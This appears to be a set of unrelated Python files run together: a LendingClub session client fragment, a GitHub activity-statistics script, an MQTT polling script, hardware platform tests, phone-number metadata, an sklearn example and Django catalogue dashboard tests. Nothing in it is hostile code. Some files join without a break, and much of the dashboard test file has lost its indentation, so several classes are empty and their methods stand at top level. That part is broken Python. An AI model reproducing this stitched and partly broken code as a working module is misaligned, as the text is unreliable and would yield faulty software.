            self.__log('Query: {0}'.format(response.headers['x-echo-query']))
        if 'x-echo-data' in response.headers:
            self.__log('Data: {0}'.format(response.headers['x-echo-data']))

        # Parse any errors from the HTML
        soup = BeautifulSoup(response.text, "html5lib")
        errors = soup.find(id='master_error-list')
        if errors:
            errors = errors.text.strip()

            # Remove extra spaces and newlines from error message
            # (raw strings fix invalid "\s" escape warnings).
            errors = re.sub(r'\t+', '', errors)
            errors = re.sub(r'\s*\n+\s*', ' * ', errors)

            if errors == '':
                errors = None

            # Raise error
            if errors is not None:
                raise AuthenticationError(errors)

        # Redirected back to the login page...must be an error
        if endpoint == 'login.action':
            raise AuthenticationError('Unknown! Redirected back to the login page without an error message')

        return True

    def is_site_available(self):
        """
        Returns true if we can access LendingClub.com
        This is also a simple test to see if there's a network connection

        Returns
        -------
        boolean
            True or False
        """
        try:
            response = requests.head(self.base_url)
            status = response.status_code
            return 200 <= status < 400  # True for any 2xx/3xx status code
        except Exception:
            return False

    def request(self, method, path, query=None, data=None, redirects=True):
        """
        Sends HTTP request to LendingClub.

        Parameters
        ----------
        method : {GET, POST, HEAD, DELETE}
            The HTTP method to use: GET, POST, HEAD or DELETE
        path : string
            The path that will be appended to the domain defined in :attr:`base_url`.
        query : dict
            A dictionary of query string parameters
        data : dict
            A dictionary of POST data values
        redirects : boolean
            True to follow redirects, False to return the original response from the server.

        Returns
        -------
        requests.Response
            A `requests.Response <http://docs.python-requests.org/en/latest/api/#requests.Response>`_ object
        """
        # Check session time
        self.__continue_session()

        try:
            url = self.build_url(path)
            method = method.upper()

            self.__log('{0} request to: {1}'.format(method, url))

            if method == 'POST':
                request = self.__session.post(url, params=query, data=data, allow_redirects=redirects)
            elif method == 'GET':
                request = self.__session.get(url, params=query, data=data, allow_redirects=redirects)
            elif method == 'HEAD':
                request = self.__session.head(url, params=query, data=data, allow_redirects=redirects)
            elif method == 'DELETE':
                request = self.__session.delete(url, params=query, data=data, allow_redirects=redirects)
            else:
                raise SessionError('{0} is not a supported HTTP method'.format(method))

            self.last_response = request

            self.__log('Status code: {0}'.format(request.status_code))

            # Update session time
            self.last_request_time = time.time()
        # BUG FIX: Timeout must be caught *before* RequestException (its base
        # class) or this branch is unreachable; the old handler also raised a
        # NameError because it never bound `e`.
        except Timeout as e:
            raise NetworkError('{0} request timed out: {1}'.format(method, url), e)
        except (RequestException, ConnectionError, TooManyRedirects, HTTPError) as e:
            raise NetworkError('{0} failed to: {1}'.format(method, url), e)

        return request

    def post(self, path, query=None, data=None, redirects=True):
        """
        POST request wrapper for :func:`request()`
        """
        return self.request('POST', path, query, data, redirects)

    def get(self, path, query=None, redirects=True):
        """
        GET request wrapper for :func:`request()`
        """
        return self.request('GET', path, query, None, redirects)

    def head(self, path, query=None, data=None, redirects=True):
        """
        HEAD request wrapper for :func:`request()`
        """
        return self.request('HEAD', path, query, None, redirects)

    def clear_session_order(self):
        """
        Clears any existing order in the LendingClub.com user session.
        """
        self.get('/portfolio/confirmStartNewPortfolio.action')

    def json_success(self, json):
        """
        Check the JSON response object for the success flag

        Parameters
        ----------
        json : dict
            A dictionary representing a JSON object from lendingclub.com
        """
        if type(json) is dict and 'result' in json and json['result'] == 'success':
            return True
        return False
class SessionError(Exception):
    """
    Base exception class for :mod:`lendingclub.session`

    Parameters
    ----------
    value : string
        The error message
    origin : Exception
        The original exception, if this exception was caused by another.
    """
    value = 'Unknown error'
    origin = None

    def __init__(self, value, origin=None):
        self.value = value
        self.origin = origin

    def __str__(self):
        rendered = repr(self.value)
        if self.origin is not None:
            rendered = '{0} (from {1})'.format(rendered, repr(self.origin))
        return rendered
class AuthenticationError(SessionError):
    """
    Authentication failed

    Raised by :meth:`Session.authenticate` when LendingClub rejects the
    credentials or redirects back to the login page.
    """
    pass
class NetworkError(SessionError):
    """
    An error occurred while making an HTTP request

    Wraps the underlying requests exception (timeout, connection failure,
    redirect loop, HTTP error) as ``origin``.
    """
    pass
|
from joblib import Parallel, delayed
from itertools import zip_longest
from collections import Counter
from github import Github
import os, sys, shutil, multiprocessing, json
class DevOracle:
    """
    Collects developer-activity statistics for a GitHub organization (or
    user) via the GitHub API and writes them to JSON files.
    """

    def __init__(self, save_path: str):
        """
        :param save_path: directory where the ``*_stats.json`` and
            ``*_history.json`` output files are written
        """
        self.save_path = save_path
        # Authenticate when a personal access token is available; anonymous
        # access has far stricter rate limits.
        if 'PAT' in os.environ:
            self.gh = Github(os.environ.get('PAT'))
        else:
            self.gh = Github()

    def single_repo_stats(self, org_then_slash_then_repo: str):
        """
        Collect summary stats for one repository ("org/repo").

        :return: dict with 'churn_4w', 'commits_4w', 'contributors',
            'stars', 'forks', 'num_releases'; empty dict when the repo or
            its statistics cannot be fetched.
        """
        try:
            repo = self.gh.get_repo(org_then_slash_then_repo)
            weekly_add_del = repo.get_stats_code_frequency()
            weekly_commits = repo.get_stats_participation().all
            contributors = repo.get_stats_contributors()
            releases = repo.get_releases()
        except Exception:  # was a bare except; keep best-effort behaviour but be explicit
            print('Could not find data for ' + org_then_slash_then_repo)
            return {}
        churn_4w = 0
        commits_4w = 0
        if weekly_add_del and weekly_commits:
            # Sum the most recent 4 weeks, stopping early when the history
            # is shorter than that.
            for i in range(1, 5):
                try:
                    # Deletions is negative
                    churn_4w += (weekly_add_del[-i]._rawData[1] - weekly_add_del[-i]._rawData[2])
                    commits_4w += weekly_commits[-i]
                except Exception:
                    break
        num_contributors = len(contributors) if contributors else 0
        stats = {
            'churn_4w': churn_4w,
            'commits_4w': commits_4w,
            'contributors': num_contributors,
            'stars': repo.stargazers_count,
            'forks': repo.forks_count,
            'num_releases': releases.totalCount
        }
        ''' FUTURE USE: dev distribution. FIXME efficient adding of these dicts for org_stats()
        contributor_distribution = []
        for dev in contributors:
            this_dev_churn = 0
            for week in dev.weeks:
                this_dev_churn += week.a + week.d
            this_dev = {
                'name': dev.author.login,
                'commits': dev.total,
                'churn': this_dev_churn
            }
            contributor_distribution.append(this_dev)
        '''
        return stats  # , contributor_distribution

    def org_stats(self, org_name: str):
        """
        Aggregate :meth:`single_repo_stats` over every repo of an org/user.

        :return: dict of summed stats; 'contributors' holds the per-repo
            maximum (a lower bound on distinct developers).
        """
        org_repos = self.make_org_repo_list(org_name)
        # GitHub API can hit spam limit, so cap parallelism at 2 jobs.
        number_of_hyperthreads = multiprocessing.cpu_count()
        n_jobs = 2 if number_of_hyperthreads > 2 else number_of_hyperthreads
        repo_count_list = Parallel(n_jobs=n_jobs)(delayed(self.single_repo_stats)(repo) for repo in org_repos)
        stats_counter = Counter()
        for repo_stats in repo_count_list:
            stats_counter += Counter(repo_stats)
        sc_dict = dict(stats_counter)
        # FIXME find an efficient way to count distinct devs. This is a good lower bound number.
        max_contributors = max((repo_stats.get('contributors', 0) for repo_stats in repo_count_list), default=0)
        # GitHub API only returns up to 100 contributors per repo.
        sc_dict['contributors'] = max_contributors
        sc_dict['num_releases'] = sc_dict.get('num_releases', 0)
        return sc_dict

    def make_org_repo_list(self, org_name: str):
        """
        Return ["org/repo", ...] for every repository of the organization,
        falling back to a user account when the org lookup fails.
        """
        try:
            entity = self.gh.get_organization(org_name)
        except Exception:
            entity = self.gh.get_user(org_name)
        repo_names = [repo.name for repo in entity.get_repos()]
        return [org_name + '/{0}'.format(name) for name in repo_names]

    def get_and_save_full_stats(self, github_org: str):
        """Fetch summary and historical stats and write both JSON files."""
        stats = self.org_stats(github_org)
        hist = self.historical_progress(github_org)
        path_prefix = self.save_path + '/' + github_org
        with open(path_prefix + '_stats.json', 'w') as outfile:
            outfile.write(json.dumps(stats))
        with open(path_prefix + '_history.json', 'w') as outfile:
            outfile.write(json.dumps(hist))

    def get_churn_and_commits(self, org_then_slash_then_repo: str):
        """
        Fetch the full weekly churn and commit history for one repository.

        Always returns a dict with 'weekly_churn', 'weekly_commits' and
        'repo'; the lists are empty (or partial) when the API call fails.
        """
        # Initialise up front so the except path cannot hit a NameError when
        # the failure happens before these were assigned (the original code
        # referenced unbound locals in its handler).
        weekly_churn = []
        weekly_commits = []
        try:
            # For front-end app use, combining this github API call with that for single_repo_stats would be beneficial
            repo = self.gh.get_repo(org_then_slash_then_repo)
            weekly_commits = repo.get_stats_participation().all
            weekly_add_del = repo.get_stats_code_frequency()
            if weekly_add_del:
                for i in range(len(weekly_add_del)):
                    # Deletions is negative
                    weekly_churn.append(weekly_add_del[i]._rawData[1] - weekly_add_del[i]._rawData[2])
        except Exception as e:
            print(e)
        return {
            'weekly_churn': weekly_churn,
            'weekly_commits': weekly_commits,
            'repo': org_then_slash_then_repo
        }

    def historical_progress(self, github_org: str):
        """
        Build org-wide weekly churn/commit time series (oldest first) with a
        matching 'weeks_ago' axis.
        """
        org_repos = self.make_org_repo_list(github_org)
        # GitHub API can hit spam limit, so cap parallelism at 2 jobs.
        number_of_hyperthreads = multiprocessing.cpu_count()
        n_jobs = 2 if number_of_hyperthreads > 2 else number_of_hyperthreads
        repo_count_list = Parallel(n_jobs=n_jobs)(delayed(self.get_churn_and_commits)(repo) for repo in org_repos)
        churns = []
        commits = []
        # Reverse each series so the *most recent* weeks align, then pad the
        # shorter histories with zeros and flip back to oldest-first.
        for repo in repo_count_list:
            churns.append(repo['weekly_churn'][::-1])
            commits.append(repo['weekly_commits'][::-1])
        churns = [sum(x) for x in zip_longest(*churns, fillvalue=0)][::-1]
        commits = [sum(x) for x in zip_longest(*commits, fillvalue=0)][::-1]
        weeks_ago = list(range(len(churns)))[::-1]
        return {
            'weekly_churn': churns,
            'weekly_commits': commits,
            'weeks_ago': weeks_ago
        }
if __name__ == '__main__':
    # An unauthenticated client hits GitHub's rate limits almost at once,
    # so insist on a PAT environment variable.
    if 'PAT' not in os.environ:
        print('This requires a GitHub PAT to do anything interesting.')
        # BUG FIX: usage text had a stray trailing ']'.
        print('Usage: python3 dev.py [GITHUB_ORG]')
        sys.exit(1)
    # Exactly one argument, and it must be a bare org/user name (no slash).
    if len(sys.argv) != 2 or '/' in sys.argv[1]:
        print('Usage: python3 dev.py [GITHUB_ORG]')
        sys.exit(1)
    do = DevOracle('./')
    do.get_and_save_full_stats(sys.argv[1])
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
####################
import json
import time
import indigo
# Poll the MQTT Connector plugin's message queue forever, logging each
# queued message as it arrives.
mqttPlugin = indigo.server.getPlugin("com.flyingdiver.indigoplugin.mqtt")
if mqttPlugin.isEnabled():
    props = {
        'message_type': "#Test#"
    }
    while True:
        message_data = mqttPlugin.executeAction("fetchQueuedMessage", deviceId=1867973662, props=props, waitUntilDone=True)
        # BUG FIX (idiom): compare against None with `is not`, not `!=`.
        if message_data is not None:
            indigo.server.log("Queue Fetch, version = {}, message_type = {}, topic_parts = {}".format(message_data["version"], message_data["message_type"], message_data["topic_parts"]))
            device_data = json.loads(message_data["payload"])
            indigo.server.log("Queue Fetch, device_data = {}".format(device_data))
        else:
            # Queue empty - back off briefly before polling again.
            time.sleep(1.0)
#!/usr/bin/env python
# Author: Costin Constantin <costin.c.constantin@intel.com>
# Copyright (c) 2015 Intel Corporation.
#
# Contributors: Alex Tereschenko <alext.mkrs@gmail.com>
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import mraa as m
import unittest as u
# Expected hardware characteristics for the board under test.
PLATFORM_PINCOUNT = 8  # total GPIO pins the platform should report
PLATFORM_STD_ADC_RES_BITS = 10  # default ADC resolution in bits
PLATFORM_MAX_ADC_RES_BITS = 12  # raw/maximum ADC resolution in bits
class PlatformChecks(u.TestCase):
    """Sanity checks of the pin count and ADC resolutions reported by mraa."""

    def test_platform_pin_count(self):
        """The platform must expose exactly the expected number of pins."""
        pin_count = m.getPinCount()
        self.assertEqual(pin_count, PLATFORM_PINCOUNT, "Wrong number of pins reported by platform")

    def test_adc_std_res(self):
        """The default ADC resolution must match the platform spec."""
        std_bits = m.adcSupportedBits()
        print("Platform ADC standard resolution is: " + str(std_bits) + " bits")
        self.assertEqual(std_bits, PLATFORM_STD_ADC_RES_BITS, "Wrong ADC standard resolution")

    def test_adc_max_res(self):
        """The raw (maximum) ADC resolution must match the platform spec."""
        max_bits = m.adcRawBits()
        print("Platform ADC max. resolution is: " + str(max_bits) + " bits")
        self.assertEqual(max_bits, PLATFORM_MAX_ADC_RES_BITS, "Wrong ADC max. resolution")
if __name__ == "__main__":
    # Run the unittest suite when executed directly.
    u.main()
|
"""Auto-generated file, do not edit by hand. FO metadata"""
from ..phonemetadata import NumberFormat, PhoneNumberDesc, PhoneMetadata
# Numbering-plan metadata for the Faroe Islands (FO), country code +298.
# NOTE(review): this file is auto-generated -- regenerate from upstream
# metadata rather than editing the patterns by hand.
PHONE_METADATA_FO = PhoneMetadata(id='FO', country_code=298, international_prefix='00',
    general_desc=PhoneNumberDesc(national_number_pattern='[2-9]\\d{5}', possible_number_pattern='\\d{6}', possible_length=(6,)),
    fixed_line=PhoneNumberDesc(national_number_pattern='(?:20|[3-4]\\d|8[19])\\d{4}', example_number='201234', possible_length=(6,)),
    mobile=PhoneNumberDesc(national_number_pattern='(?:[27][1-9]|5\\d)\\d{4}', example_number='211234', possible_length=(6,)),
    toll_free=PhoneNumberDesc(national_number_pattern='80[257-9]\\d{3}', possible_number_pattern='\\d{6}', example_number='802123', possible_length=(6,)),
    premium_rate=PhoneNumberDesc(national_number_pattern='90(?:[1345][15-7]|2[125-7]|99)\\d{2}', possible_number_pattern='\\d{6}', example_number='901123', possible_length=(6,)),
    shared_cost=PhoneNumberDesc(),
    personal_number=PhoneNumberDesc(),
    voip=PhoneNumberDesc(national_number_pattern='(?:6[0-36]|88)\\d{4}', possible_number_pattern='\\d{6}', example_number='601234', possible_length=(6,)),
    pager=PhoneNumberDesc(),
    uan=PhoneNumberDesc(),
    voicemail=PhoneNumberDesc(),
    no_international_dialling=PhoneNumberDesc(),
    national_prefix_for_parsing='(10(?:01|[12]0|88))',
    number_format=[NumberFormat(pattern='(\\d{6})', format='\\1', domestic_carrier_code_formatting_rule='$CC \\1')])
|
import numpy as np
# using sklearn
from sklearn.neural_network import MLPClassifier
# Two training samples in 2-D with binary class labels.
x = [[0., 0.], [1., 1.]]
y = [0, 1]
# Tiny multi-layer perceptron; 'lbfgs' converges well on small datasets and
# the fixed random_state makes the run reproducible.
clf = MLPClassifier(solver='lbfgs', alpha=1e-5, hidden_layer_sizes=(5, 2), random_state=1)
clf.fit(x,y)
# Predict the class of two unseen points.
print(clf.predict([[2., 2.], [-1., -2.]]))
from http import client as http_client
import json
from django.conf import settings
from django.contrib.messages import ERROR, INFO
from django.urls import reverse
from django.utils.http import urlencode
from django.utils.translation import gettext
from izi.core.loading import get_class, get_model
from izi.test.factories import (
AttributeOptionFactory, AttributeOptionGroupFactory, CategoryFactory,
PartnerFactory, ProductAttributeFactory, ProductFactory, create_product)
from izi.test.testcases import WebTestCase, add_permissions
# Resolve the models and dashboard classes under test through izi's dynamic
# loading framework, so overridden apps in forks are picked up.
Product = get_model('catalogue', 'Product')
ProductClass = get_model('catalogue', 'ProductClass')
ProductCategory = get_model('catalogue', 'ProductCategory')
Category = get_model('catalogue', 'Category')
StockRecord = get_model('partner', 'stockrecord')
AttributeOptionGroup = get_model('catalogue', 'AttributeOptionGroup')
AttributeOption = get_model('catalogue', 'AttributeOption')
AttributeOptionGroupForm = get_class('dashboard.catalogue.forms',
                                     'AttributeOptionGroupForm')
AttributeOptionFormSet = get_class('dashboard.catalogue.formsets',
                                   'AttributeOptionFormSet')
RelatedFieldWidgetWrapper = get_class('dashboard.widgets',
                                      'RelatedFieldWidgetWrapper')
class TestCatalogueViews(WebTestCase):
    """Smoke tests for the dashboard catalogue list views and the UPC filter."""
    is_staff = True

    def _products_for_upc(self, upc_query):
        """GET the product list filtered by *upc_query*; return the product rows."""
        page = self.get("%s?upc=%s" %
                        (reverse('dashboard:catalogue-product-list'), upc_query))
        return [row.record for row
                in page.context['products'].page.object_list]

    def test_exist(self):
        urls = [reverse('dashboard:catalogue-product-list'),
                reverse('dashboard:catalogue-category-list'),
                reverse('dashboard:stock-alert-list')]
        for url in urls:
            self.assertIsOk(self.get(url))

    def test_upc_filter(self):
        product1 = create_product(upc='123')
        product2 = create_product(upc='12')
        product3 = create_product(upc='1')

        # no value for upc, all results
        products_on_page = self._products_for_upc('')
        self.assertIn(product1, products_on_page)
        self.assertIn(product2, products_on_page)
        self.assertIn(product3, products_on_page)

        # filter by upc, one result
        products_on_page = self._products_for_upc('123')
        self.assertIn(product1, products_on_page)
        self.assertNotIn(product2, products_on_page)
        self.assertNotIn(product3, products_on_page)

        # exact match, one result, no multiple
        products_on_page = self._products_for_upc('12')
        self.assertNotIn(product1, products_on_page)
        self.assertIn(product2, products_on_page)
        self.assertNotIn(product3, products_on_page)

        # part of the upc, one result
        products_on_page = self._products_for_upc('3')
        self.assertIn(product1, products_on_page)
        self.assertNotIn(product2, products_on_page)
        self.assertNotIn(product3, products_on_page)

        # part of the upc, two results
        products_on_page = self._products_for_upc('2')
        self.assertIn(product1, products_on_page)
        self.assertIn(product2, products_on_page)
        self.assertNotIn(product3, products_on_page)
class TestAStaffUser(WebTestCase):
is_staff = True
def setUp(self):
super().setUp()
self.partner = PartnerFactory()
def test_can_create_a_product_without_stockrecord(self):
category = CategoryFactory()
product_class = ProductClass.objects.create(name="Book")
page = self.get(reverse('dashboard:catalogue-product-create',
args=(product_class.slug,)))
form = page.form
form['upc'] = '123456'
form['title'] = 'new product'
form['productcategory_set-0-category'] = category.id
form.submit()
self.assertEqual(Product.objects.count(), 1)
def test_can_create_and_continue_editing_a_product(self):
category = CategoryFactory()
product_class = ProductClass.objects.create(name="Book")
page = self.get(reverse('dashboard:catalogue-product-create',
args=(product_class.slug,)))
form = page.form
form['upc'] = '123456'
form['title'] = 'new product'
form['productcategory_set-0-category'] = category.id
form['stockrecords-0-partner'] = self.partner.id
form['stockrecords-0-partner_sku'] = '14'
form['stockrecords-0-num_in_stock'] = '555'
form['stockrecords-0-price_excl_tax'] = '13.99'
page = form.submit(name='action', value='continue')
self.assertEqual(Product.objects.count(), 1)
product = Product.objects.all()[0]
self.assertEqual(product.stockrecords.all()[0].partner, self.partner)
self.assertRedirects(page, reverse('dashboard:catalogue-product',
kwargs={'pk': product.id}))
def test_can_update_a_product_without_stockrecord(self):
new_title = 'foobar'
category = CategoryFactory()
product = ProductFactory(stockrecords=[])
page = self.get(
reverse('dashboard:catalogue-product',
kwargs={'pk': product.id})
)
form = page.forms[0]
form['productcategory_set-0-category'] = category.id
self.assertNotEqual(form['title'].value, new_title)
form['title'] = new_title
form.submit()
try:
product = Product.objects.get(pk=product.pk)
except Product.DoesNotExist:
pass
else:
self.assertTrue(product.title == new_title)
if product.has_stockrecords:
self.fail('Product has stock records but should not')
def test_can_create_product_with_required_attributes(self):
category = CategoryFactory()
attribute = ProductAttributeFactory(required=True)
product_class = attribute.product_class
page = self.get(reverse('dashboard:catalogue-product-create',
args=(product_class.slug,)))
form = page.form
form['upc'] = '123456'
form['title'] = 'new product'
form['attr_weight'] = '5'
form['productcategory_set-0-category'] = category.id
form.submit()
self.assertEqual(Product.objects.count(), 1)
def test_can_delete_a_standalone_product(self):
product = create_product(partner_users=[self.user])
category = Category.add_root(name='Test Category')
ProductCategory.objects.create(category=category, product=product)
page = self.get(reverse('dashboard:catalogue-product-delete',
args=(product.id,))).form.submit()
self.assertRedirects(page, reverse('dashboard:catalogue-product-list'))
self.assertEqual(Product.objects.count(), 0)
self.assertEqual(StockRecord.objects.count(), 0)
self.assertEqual(Category.objects.count(), 1)
self.assertEqual(ProductCategory.objects.count(), 0)
def test_can_delete_a_parent_product(self):
    """Deleting a parent product removes its child products as well."""
    parent = create_product(structure='parent')
    create_product(parent=parent)
    delete_url = reverse(
        'dashboard:catalogue-product-delete',
        args=(parent.id,))
    response = self.get(delete_url).form.submit()
    self.assertRedirects(response, reverse('dashboard:catalogue-product-list'))
    self.assertEqual(Product.objects.count(), 0)
def test_can_delete_a_child_product(self):
    """Deleting a child product redirects to the parent's detail page
    and leaves only the parent behind."""
    parent_product = create_product(structure='parent')
    child_product = create_product(parent=parent_product)
    url = reverse(
        'dashboard:catalogue-product-delete',
        args=(child_product.id,))
    page = self.get(url).form.submit()
    expected_url = reverse(
        'dashboard:catalogue-product', kwargs={'pk': parent_product.pk})
    self.assertRedirects(page, expected_url)
    # Only the parent remains after the child is deleted.
    self.assertEqual(Product.objects.count(), 1)
def test_can_list_her_products(self):
    """A staff user sees all products on the list page, including ones
    belonging to other partners."""
    product1 = create_product(partner_users=[self.user, ])
    product2 = create_product(partner_name="sneaky", partner_users=[])
    page = self.get(reverse('dashboard:catalogue-product-list'))
    products_on_page = [row.record for row
                        in page.context['products'].page.object_list]
    self.assertIn(product1, products_on_page)
    # Staff are not restricted to their own partner's products.
    self.assertIn(product2, products_on_page)
def test_can_create_a_child_product(self):
    """Submitting the child-product creation form adds a second product."""
    parent = create_product(structure='parent')
    create_child_url = reverse(
        'dashboard:catalogue-product-create-child',
        kwargs={'parent_pk': parent.pk})
    self.get(create_child_url).form.submit()
    self.assertEqual(Product.objects.count(), 2)
def test_cant_create_child_product_for_invalid_parents(self):
    """A product with stock records cannot act as a parent; the create-child
    view redirects back to the product list instead."""
    # Creates a product with stockrecords.
    invalid_parent = create_product(partner_users=[self.user])
    self.assertFalse(invalid_parent.can_be_parent())
    url = reverse(
        'dashboard:catalogue-product-create-child',
        kwargs={'parent_pk': invalid_parent.pk})
    self.assertRedirects(
        self.get(url), reverse('dashboard:catalogue-product-list'))
class TestANonStaffUser(TestAStaffUser):
    """Re-runs the staff dashboard tests as a partner user with only
    ``partner.dashboard_access``; tests that do not apply to the
    permission-based dashboard are overridden as no-ops."""
    is_staff = False
    is_anonymous = False
    permissions = ['partner.dashboard_access', ]

    def setUp(self):
        super().setUp()
        # Grant dashboard access and tie the user to the partner fixture.
        add_permissions(self.user, self.permissions)
        self.partner.users.add(self.user)

    def test_can_list_her_products(self):
        """Unlike staff, a partner user only sees her own partner's products."""
        product1 = create_product(partner_name="A", partner_users=[self.user])
        product2 = create_product(partner_name="B", partner_users=[])
        page = self.get(reverse('dashboard:catalogue-product-list'))
        products_on_page = [row.record for row
                            in page.context['products'].page.object_list]
        self.assertIn(product1, products_on_page)
        self.assertNotIn(product2, products_on_page)

    def test_cant_create_a_child_product(self):
        """Child-product creation is forbidden for non-staff users."""
        parent_product = create_product(structure='parent')
        url = reverse(
            'dashboard:catalogue-product-create-child',
            kwargs={'parent_pk': parent_product.pk})
        response = self.get(url, status='*')
        self.assertEqual(http_client.FORBIDDEN, response.status_code)

    # Tests below can't work because they don't create a stockrecord
    def test_can_create_a_product_without_stockrecord(self):
        pass

    def test_can_update_a_product_without_stockrecord(self):
        pass

    def test_can_create_product_with_required_attributes(self):
        pass

    # Tests below can't work because child products aren't supported with the
    # permission-based dashboard
    def test_can_delete_a_child_product(self):
        pass

    def test_can_delete_a_parent_product(self):
        pass

    def test_can_create_a_child_product(self):
        pass

    def test_cant_create_child_product_for_invalid_parents(self):
        pass
class AttributeOptionGroupCreateMixin(object):
    """Shared set-up values and assertions for the attribute-option-group
    create view tests."""

    def _set_up_display_create_form_vars(self):
        # URL name and expected page title for the create-form GET assertions.
        self.url_name = 'dashboard:catalogue-attribute-option-group-create'
        self.title = gettext("Add a new Attribute Option Group")

    def _test_display_create_form_response(self):
        """Assert the GET response renders an unsaved form and formset."""
        response = self.response
        self.assertEqual(response.status_code, http_client.OK)
        self.assertTemplateUsed(response, 'dashboard/catalogue/attribute_option_group_form.html')
        self.assertInContext(response, 'form')
        self.assertIsInstance(response.context['form'], AttributeOptionGroupForm)
        # _state.adding is True only for instances not yet saved to the DB.
        self.assertTrue(response.context['form'].instance._state.adding)
        self.assertInContext(response, 'attribute_option_formset')
        self.assertIsInstance(response.context['attribute_option_formset'], AttributeOptionFormSet)
        self.assertTrue(response.context['attribute_option_formset'].instance._state.adding)
        self.assertInContext(response, 'title')
        self.assertEqual(response.context['title'], self.title)

    def _set_up_create_vars(self):
        # Values that the create tests submit through the form.
        self.url_name = 'dashboard:catalogue-attribute-option-group-create'
        self.attribute_option_group_name = 'Test Attribute Option Group'
        self.attribute_option_option = 'Test Attribute Option'

    def _set_up_create_success_vars(self):
        # Redirect target and flash message expected after a successful create.
        self.success_url_name = 'dashboard:catalogue-attribute-option-group-list'
        self.success_message = gettext("Attribute Option Group created successfully")

    def _test_creation_of_objects(self):
        # Test the creation of the attribute option group
        self.assertEqual(1, AttributeOptionGroup.objects.all().count())
        attribute_option_group = AttributeOptionGroup.objects.first()
        self.assertEqual(attribute_option_group.name, self.attribute_option_group_name)

        # Test the creation of the attribute option
        self.assertEqual(1, AttributeOption.objects.all().count())
        attribute_option = AttributeOption.objects.first()
        self.assertEqual(attribute_option.group, attribute_option_group)
        self.assertEqual(attribute_option.option, self.attribute_option_option)
class AttributeOptionGroupUpdateMixin(object):
    """Shared set-up values and assertions for the attribute-option-group
    update view tests."""

    def _set_up_display_update_form_vars(self):
        # URL and expected page title for the update-form GET assertions.
        url_name = 'dashboard:catalogue-attribute-option-group-update'
        self.url = reverse(url_name, kwargs={'pk': self.attribute_option_group.pk})
        self.title = gettext("Update Attribute Option Group '%s'") % self.attribute_option_group.name

    def _test_display_update_form_response(self):
        """Assert the GET response renders the form bound to the existing group."""
        response = self.response
        self.assertEqual(response.status_code, http_client.OK)
        self.assertTemplateUsed(response, 'dashboard/catalogue/attribute_option_group_form.html')
        self.assertInContext(response, 'form')
        self.assertIsInstance(response.context['form'], AttributeOptionGroupForm)
        self.assertEqual(response.context['form'].instance, self.attribute_option_group)
        self.assertInContext(response, 'attribute_option_formset')
        self.assertIsInstance(response.context['attribute_option_formset'], AttributeOptionFormSet)
        # The first formset form must be bound to the group's first option.
        self.assertEqual(
            response.context['attribute_option_formset'].initial_forms[0].instance,
            self.attribute_option_group.options.first())
        self.assertInContext(response, 'title')
        self.assertEqual(response.context['title'], self.title)

    def _set_up_update_vars(self):
        # New values that the update tests submit through the form.
        url_name = 'dashboard:catalogue-attribute-option-group-update'
        self.url = reverse(url_name, kwargs={'pk': self.attribute_option_group.pk})
        self.attribute_option_group_name = 'Test Attribute Option Group'
        self.attribute_option_option = 'Test Attribute Option'

    def _set_up_update_success_vars(self):
        # Redirect target and flash message expected after a successful update.
        self.success_url_name = 'dashboard:catalogue-attribute-option-group-list'
        self.success_message = gettext("Attribute Option Group updated successfully")

    def _test_update_of_objects(self):
        # Test the update of the attribute option group
        attribute_option_group = AttributeOptionGroup.objects.first()
        self.assertEqual(attribute_option_group.name, self.attribute_option_group_name)

        # Test the update of the attribute option
        self.assertEqual(attribute_option_group.options.first().option, self.attribute_option_option)
class AttributeOptionGroupDeleteMixin(object):
    """Shared set-up values and assertions for the attribute-option-group
    delete view tests."""

    def _set_up_display_delete_form_vars(self):
        url_name = 'dashboard:catalogue-attribute-option-group-delete'
        self.url = reverse(url_name, kwargs={'pk': self.attribute_option_group.pk})

    def _set_up_display_delete_form_allowed_vars(self):
        # Title shown when deletion is permitted.
        self.title = gettext("Delete Attribute Option Group '%s'") % self.attribute_option_group.name

    def _set_up_display_delete_form_disallowed_vars(self):
        # Title and error shown when product attributes still use the group.
        self.title = gettext("Unable to delete '%s'") % self.attribute_option_group.name
        self.error_message = gettext("1 product attributes are still assigned to this attribute option group")

    def _test_display_delete_form_response(self):
        """Assert the confirmation page renders with the expected title."""
        response = self.response
        self.assertEqual(response.status_code, http_client.OK)
        self.assertTemplateUsed(response, 'dashboard/catalogue/attribute_option_group_delete.html')
        self.assertInContext(response, 'title')
        self.assertEqual(response.context['title'], self.title)

    def _test_display_delete_disallowed_response(self):
        """Assert the view flags deletion as disallowed with one error message."""
        response = self.response
        self.assertInContext(response, 'disallow')
        self.assertTrue(response.context['disallow'])
        messages = list(response.context['messages'])
        self.assertEqual(len(messages), 1)
        self.assertEqual(messages[0].level, ERROR)
        self.assertEqual(messages[0].message, self.error_message)

    def _set_up_delete_vars(self):
        url_name = 'dashboard:catalogue-attribute-option-group-delete'
        self.url = reverse(url_name, kwargs={'pk': self.attribute_option_group.pk})

    def _set_up_delete_success_vars(self):
        # Redirect target and flash message expected after a successful delete.
        self.success_url_name = 'dashboard:catalogue-attribute-option-group-list'
        self.success_message = gettext("Attribute Option Group deleted successfully")

    def _test_deletion_of_objects(self):
        # Test the deletion of the attribute option group
        attribute_option_group_exists = AttributeOptionGroup.objects.exists()
        self.assertFalse(attribute_option_group_exists)

        # Test the deletion of the attribute option
        attribute_option_exists = AttributeOption.objects.exists()
        self.assertFalse(attribute_option_exists)
class AttributeOptionGroupPopUpWindowMixin(object):
    """Assertions shared by tests that drive the views as admin-style
    popup windows (RelatedFieldWidgetWrapper)."""

    def _set_up_pop_up_window_vars(self):
